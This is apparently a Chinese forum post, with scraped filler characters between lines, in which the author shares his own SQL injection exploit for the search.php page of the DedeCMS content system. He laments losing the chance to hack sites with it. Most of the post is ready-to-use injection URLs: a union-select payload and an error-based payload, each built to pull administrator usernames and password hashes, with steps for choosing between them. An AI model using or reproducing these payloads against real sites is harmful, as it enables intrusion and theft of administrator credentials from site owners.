转载不加作者名的没JJ8 W! B# {& n$ g6 ]/ c; P
$ |. T' q; f8 j M哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' {5 C; A% b' D; e) W( {% v5 G& y& [+ j1 d3 ?$ E1 J8 H# ^
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。$ D6 k( o* `) U ?. U/ W2 o
! l# M/ L: k8 W: o3 Z. }
我一般是这样测试的:/ A6 v6 K$ \, Z& Y6 }, K+ o) X
6 W( r5 Z% l1 z5 |
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a3 _' I6 y9 p8 b6 ?3 l0 N
" t: X2 r( O% X3 M5 m转载不加作者名的没JJ( R' ]( P# A% {; L
% \2 A7 K) Y: `) M$ P) B
作者:鬼哥# Z4 l- [, w" e, E. ^- f
3 i* `2 z) B4 A6 |" e J! I
) k$ w: {2 N9 {2 r
8 K5 i' V" {% K) [看结果如果提示
/ O {! E7 I$ @4 x6 ]( O' O6 a' m0 m, d# z0 a3 C% d. m
Safe Alert: Request Error step 2 !' S6 f4 L" {4 W* q4 h1 r" w
9 ?7 H: P* q( `& e$ w+ {那么直接用下面的exp
- [* |" D' l7 B# d+ x" D7 b! O6 M& e4 [6 M) L6 t8 }" I$ X
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a+ Y4 X" \# z! B2 Q: w/ H3 U9 K9 u
" E3 g$ p5 {( O+ {
8 O4 c& V+ V* {; ]2 Y: j
看结果如果提示8 `# c$ z& j) d/ O# u J0 [
+ F! \8 G8 T# w9 k$ m; \Safe Alert: Request Error step 1 !
" P* ]2 Y b: t- I3 r
% d4 h4 q' L1 f. {( W/ \* u) [那么直接用下面的exp
: m3 ~8 i- o) H) p% K( E6 D1 D$ {. v! {8 |1 X. b
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# X8 C h, @3 K
9 `; h' ^! L. u; j8 e+ H S$ l c u' G/ w
如果正常显示证明漏洞不存在了。
' y% ]4 V. `6 k" h$ t' L6 g' {& ~& ~8 }. _. b( ?- v
转载不加作者名的没JJ |